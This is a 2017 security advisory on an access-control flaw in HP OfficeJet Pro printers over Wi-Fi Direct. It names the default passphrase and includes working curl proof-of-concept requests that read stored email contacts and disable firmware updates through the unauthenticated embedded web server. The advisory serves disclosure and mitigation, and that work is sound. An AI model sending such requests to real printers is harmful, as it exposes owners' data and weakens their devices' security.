HP Printers Wi-Fi Direct Improper Access Control

HP Printers Wi-Fi Direct Improper Access Control
1. Advisory Information
Title: HP Printers Wi-Fi Improper Access Control
Advisory ID: NESESO-2017-0111
Advisory URL: http://neseso.com/advisories/NESESO-2017-0111.pdf
Date published: 2017-02-01
Date of last update: 2017-02-01
Vendors contacted: Hewlett Packard
Release mode: User Release
2. Vulnerability Information
Class: Configuration [CWE-16], Improper Access Control [CWE-284]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
3. Vulnerability Description
HP printers with Wi-Fi Direct support, let you print from a mobile device directly to the printer
without connecting to a wireless network. Several of these printers are prone to a security
vulnerability that allows an external system to obtain unrestricted remote read/write access to
the printer configuration using the embedded web server.
4. Vulnerable Packages
• HP OfficeJet Pro 8710 firmware version WBP2CN1619BR
• HP OfficeJet Pro 8620 firmware version FDP1CN1547AR
Other products and versions might be affected too, but they were not tested.
5. Vendor Information, Solutions and Workarounds
There was no official answer from HP Inc. after several attempts (see [Sec. 8]); contact vendor
for further information.
Some mitigation actions may be:
• Disable Wi-Fi Direct functionality to protect your device.
• Enable Password Settings on the Embedded Web Server.

6. Credits
This vulnerability was discovered and researched by a member from Neseso Research Team.
7. Technical Description
Wi-Fi Direct Improper Access Control
Wi-Fi Direct [1], initially called Wi-Fi P2P, is a Wi-Fi standard enabling devices to easily connect
with each other without requiring a wireless access point. It is useful for everything from internet
browsing to file transfer, and to communicate with one or more devices simultaneously at typical
Wi-Fi speeds. In a scenario where two devices want to connect they can authenticate using
methods such as PIN, Push-Button or NFC.
HP Printers implement Wi-Fi Direct[2] support in two ways, one as described on the Wi-Fi Direct
specification and the other providing a wi-fi access point that has no security or uses insecure
default credentials (12345678 passphrase is used by default on newer models). Giving access
to anyone that is near enough to establish a Wi-Fi connection without any user interaction or
notification. The second vulnerability is that the printing services and others, such as the
Embedded Web Server has no authentication by default which gives anyone the ability to not
only access sensitive information but also modify device configuration. These two vulnerabilities
exposes user information and gives unrestricted remote read/write access to the configuration
and services of the printer.
Below two examples of HTTP requests that attackers could use to access emails stored on the
device or disable automatic firmware updates.
$ curl -v --insecure https://192.168.223.1/DevMgmt/Email/Contacts
* Trying 192.168.223.1...
* Connected to 192.168.223.1 (192.168.223.1) port 443 (#0)
* TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256
* Server certificate: HP16B465
> GET /DevMgmt/Email/Contacts HTTP/1.1
> Host: 192.168.223.1
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number:
XXXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR}
< Content-Type: text/xml
< Content-Length: 203
< Cache-Control: must-revalidate, max-age=0
< Pragma: no-cache
<
* Connection #0 to host 192.168.1.17 left intact

$ cat data.xml
disabled
disabled
$ curl -v -X PUT --insecure -d @data.xml https://192.168.223.1/FirmwareUpdate/
WebFWUpdate/Config --header "Content-Type:text/xml"
* Trying 192.168.223.1...
* Connected to 192.168.223.1 (192.168.223.1) port 443 (#0)
* TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256
* Server certificate: HP16B465
> PUT /FirmwareUpdate/WebFWUpdate/Config HTTP/1.1
> Host: 192.168.223.1
> User-Agent: curl/7.43.0
> Accept: */*
> Content-Type:text/xml
> Content-Length: 487
>
* upload completely sent off: 487 out of 487 bytes
< HTTP/1.1 200 OK
< Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number:
XXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR}
< Content-Length: 0
< Cache-Control: must-revalidate, max-age=0
< Pragma: no-cache
<
* Connection #0 to host 192.168.223.1 left intact
Attackers can do other attacks such as setting a proxy, doing configuration backups, getting
network information among others.
8. Report Timeline
• 2017-01-11: Neseso attempted to contact HP Inc. security contact.
• 2017-01-13: Neseso attempted to contact HP Inc. security contact.
• 2017-01-16: Neseso attempted to contact HP Inc. security contact for third time using the
web form to report vulnerabilities on Hewlett Packard Enterprise site.
• 2017-01-17: HP Enterprise contact reply that printers vulnerabilities must be reported to
contact HP Inc.
• 2017-01-17: Neseso asked HP Enterprise if there is other security contact for HP Inc.
besides the one used before.
• 2017-01-17: HP Enterprise security contact replied that the security contact for HP Inc. is
correct and we should contact them.
• 2017-01-17: Neseso attempted for fourth time to contact HP Inc. security contact.
• 2017-01-23: Neseso notifies that if the vendor refuses to response the advisory will be
released on February 1st, 2017.
• 2017-01-26: Neseso informed HP Inc. that it is their last chance to answer the emails, if not
the advisory was going to be released on February 1st, 2017.
• 2017-02-01: Advisory NESESO-2017-0111 published as 'user release'.
9. References
[1] - http://www.wi-fi.org/discover-wi-fi/wi-fi-direct

[2] - http://www8.hp.com/us/en/ads/mobility/wireless-direct-printing.html
10. About Neseso
Neseso is an independent security consulting company with more than 10 years of experience
in security research and vulnerability assessment.
11. Copyright Notice
The contents of this advisory are copyright (c) 2016 Neseso and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 4.0 License: http://creativecommons.org/
licenses/by-nc-sa/4.0/